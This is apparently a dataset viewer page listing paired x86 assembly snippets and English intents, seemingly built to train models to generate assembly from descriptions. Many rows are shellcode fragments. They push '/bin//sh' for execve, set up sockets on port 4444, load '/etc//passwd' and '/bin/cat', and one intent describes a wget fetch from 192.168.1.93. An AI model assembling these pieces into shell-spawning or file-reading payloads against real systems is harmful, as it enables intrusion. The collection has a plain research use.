SNIPPETS stringlengths 2 1.64k | INTENTS stringlengths 4 1.66k |
|---|---|
push ebx | push the sock file descriptor stored in ebx |
push ebx | push "/bin/sh" on stack |
push ebx | push ebx(0) onto stack (ipproto_ip = 0) |
push ebx | push ebx(1) onto stack (sock_stream = 1) |
push ebx | push the string Ô////bin/bashÕ on tsack |
push ebx | push the pointer to /bin/bash |
push ebx | push ptr addr on stack |
push ebx | push pointer |
push ebx | value in ebx=1 is pushed in to the stack (sock_stream =1) |
push ebx | pushe 0 onto the stack for first arg of inaddr_any for the local host |
push ebx | pushes the 2nd arg for connection que size to 0 |
push ebx | pushes the memory address of the string onto the stack |
push ebx | push ebx on stack |
push ebx | push address of /bin/sh |
push ebx | preserve ebx on the stack |
push ebx | push the contents of ebx register onto the stack |
push ebx | push the contents of the ebx register onto the stack |
push ebx | push the ebx value to the stack |
push ebx | push ebx onto the stack |
push ebx | push the contents of ebx onto the stack |
push ebx | push ebx to the stack |
push ebx \n inc ebx \n push ebx | push ebx on stack, increment its content by1 and push it again on stack |
push ebx \n mov eax, esp | push the contents of the ebx register onto the stack and point eax to the stack register |
push ebx \n mov ecx, esp | push ebx in the stack and then move its contents into ecx register |
push ebx \n mov ecx, esp | move the character x from ebx register to ecx register |
push ebx \n mov ecx, esp | moving the pointer to "/bin//sh" to ecx |
push ebx \n mov ecx, esp | load ebx into ecx register |
push ebx \n mov ecx, esp | push the contents of the ebx register onto the stack and point ecx to the stack register |
push ebx \n mov ecx,esp | push ebx content on the satck and load it into ecx register |
push ebx \n mov edx, esp | push the contents of the ebx register onto the stack and point edx to the stack register |
push ebx \n pop ecx | load ebx content into ecx register |
push ebx \n push 0x1 \n push 0xa | push on stack the arguemnts ip_proto = 0, sock_stream =1, pf_inet6 = 10 |
push ebx \n push 0x4 | push ebx and the value 0x4 on stack |
push ebx \n push 0x6 \n pop eax | load ebx content concatenating with hexadecimal value 0x6 into eax reister |
push ebx \n push byte 10 | push ebx contente and the byte 10 on stack |
push ebx \n push ebx | push null on stack two times |
push ebx \n push ebx | push 0 two times |
push ebx \n push ebx \n push esi | push ebx two times and esi content on stack |
push ebx \n push ebx \n push esi | push ebx two times andesi contents on stack |
push ebx \n push ecx | push ebx and ecx contents on stack |
push ecx | push null in stack |
push ecx | push ecx on the satck |
push ecx | load the real ip address in the stack |
push ecx | push ecx content on the stack |
push ecx | push ecx on stack |
push ecx | push the pointer v4lhost on stack |
push ecx | push the pointer to struct on stack |
push ecx | push the pointer to sockfd on stack |
push ecx | push null on stack |
push ecx | push the pointer to host_sockfd |
push ecx | push ecx on register |
push ecx | push null terminating string on stack |
push ecx | push the pointer to sock addr stored in ecx |
push ecx | push ecx(struct pointer) onto the stack |
push ecx | push \x00 to the stack |
push ecx | push pointer address on stack |
push ecx | push serv_addr saved in ecx |
push ecx | push struct pointer |
push ecx | push the memory location of previous args onto the stack |
push ecx | push ecx content on stack |
push ecx | push &serv_addr saved in ecx |
push ecx | preserve ecx on the stack |
push ecx | push the contents of the ecx register onto the stack |
push ecx | push the value of register ecx onto the stack |
push ecx | push ecx onto the stack |
push ecx | push the contents of ecx register onto the stack |
push ecx | push the ecx onto the stack |
push ecx | push ecx on the stack |
push ecx | push ecx to the stack |
push ecx | push the contents of the ecx register onto the stack. |
push ecx \n mov ecx,esp | push ecx on the stack and then place pointer to ecx |
push ecx \n mov edx,esp | push ecx on the stack and then place pointer to edx |
push ecx \n pop edi | load ecx contents into edi register |
push ecx \n push 0x2 \n push 0x2 | push ecx content, the value 0x2 two times on stack |
push ecx \n push 0x64777373 \n push 0x61702f2f \n push 0x6374652f \n mov ecx,esp | load Ô/etc//passwdÕ and null teminating string into ecx register |
push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx, esp | load Ô/bin//sh\0Õ on ebx register |
push ecx \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp | push the string /bin//sh\0\0\0\0\0\0\0\0 on the stack and place pointer to eb |
push ecx \n push 0x68736162 \n push 0x2f6e6962 \n push 0x2f2f2f2f | push ecx cotent, ÔhsabÕ, Ô/nibÕ and Ô////Õ on stack |
push ecx \n push 0x7461632f \n push 0x6e69622f \n mov ebx,esp | load Ô/bin/catÕ and null teminating string into ebx register |
push ecx \n push 0x8 \n push edx \n push esi \n mov ecx, esp | load ecx content, hexadecimal value 0x8, edx content, esi content into ecx register |
push ecx \n push 0xb \n pop eax \n push 0x68732f2f \n push 0x6e69622f \n mov ebx,esp | load __nr_execve syscall into eax register and the string Ô/bin//sh\0Õ into ebx register |
push ecx \n push dword 0x68732f2f \n push dword 0x6e69622f \n mov ebx, esp | load Ô/bin//sh\0Õ into ebx register |
push ecx \n push eax | push the pointer to sockaddr and the fd received previously on stack |
push ecx \n push ebx | push ecx and ebx content on stack |
push ecx \n push ebx \n mov ecx,esp | load the string /usr/bin/wget 192.168.1.93//x </dev/null2<&1 in ecx register |
push ecx \n push ebx \n pop ebx | save null terminating string Ô/bin/shÕ into ebx |
push ecx \n push ebx \n push dword 0x2 \n mov ecx, esp | push ecx and ebx contents and 32 bit equal to 2 on the stack and then put esp in ecx |
push ecx \n push ecx \n push esi | push the value 0 to the stack for 2 times and then push esi |
push ecx \n push esi | push ecx and esi contents on the stack |
push ecx \n push esi | push ecx and esi contents on stack |
push ecx \n push esi | push ecx and esi contents |
push ecx \n push word 0x5c11 \n push word 0x2 \n mov ecx, esp | load ecx content, af_inet in 32bit and the 32bit value 4444 on ecx |
push edi | push nib// in stack |
push edi | push the string //sbin// on the stack |
push edi | push edi content on the stack |
push edi | push "c-" on stack |
push edi | push edi content |
push edi | push Ô-cÕ value on stack |
push edi | push the edi onto the stack |
push edi | push edi to the stack |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.